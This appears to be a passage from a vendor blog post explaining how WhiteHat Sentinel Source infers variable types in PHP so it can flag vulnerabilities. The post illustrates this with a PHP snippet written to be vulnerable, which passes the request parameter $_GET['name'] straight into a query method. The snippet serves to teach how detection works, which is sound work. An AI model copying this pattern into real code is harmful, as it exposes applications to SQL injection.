You may be asking yourself: “what if $anonymous was of type NotSoAnonymous or NsaAnonymous? Would it still flag a vulnerability?” The answer is a resounding yes. Static analysis technologies do not, and in my opinion should not, attempt to evaluate conditionals as such practice will lead to an overwhelming number of lost vulnerabilities. Static code analysis could support trivial conditionals, such as comparing primitives, but conditionals in real-world code require much more guesswork and various forms of heuristics that ultimately lead to poor results. Even so, is it not fair to say that at some point in the application “funct_a()” will be greater than “funct_b()”? Otherwise, what is the point of the conditional in the first place? Our technology assumes all conditionals will be true at some point in time.

Remember when I said this was easy in theory? Well, this is where it starts to get really interesting: Consider the following code snippet and assume we do not have the source code available for “create_class_1()”, “create_class_2()” and “create_class_3()”:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = create_class_1();
} elseif (funct_a() == funct_b()) {
     $anonymous = create_class_2();
} else {
     $anonymous = create_class_3();
}

$anonymous->runQuery($_GET['name']);

Now what is the range of possible data types for the $anonymous variable when used in the vulnerable statement? This is where we being to stress the capabilities of the security rule language itself. WhiteHat Sentinel Source solves this by allowing the security rule writer to explicitly define the data type returned from a function invocation if such data type cannot be determined based on the provided source code. For example, the security rule writer could capture a rule stating that the return value of the create_class_3() function invocation is of type Anonymous. The engine would then take this information, propagate data types as before and correctly flag the SQL Injection vulnerability associated with runQuery method invocation.

WhiteHat Sentinel Source’s type inference system allows us to perform more accurate and efficient analysis of source code in dynamically typed languages. Our type inference system not only allows us to more accurately capture security rules, but it also allows us to more accurately model control flow from method invocations of instances to method declarations of class declarations. Such capability is critical for any real world static code analysis of PHP source code.

I hope you enjoyed this rather technical and slightly lengthy blog post. It was a blast building out support for PHP and I look forward to our Sentinel Source customers benefiting from our newly available technology. Until next time…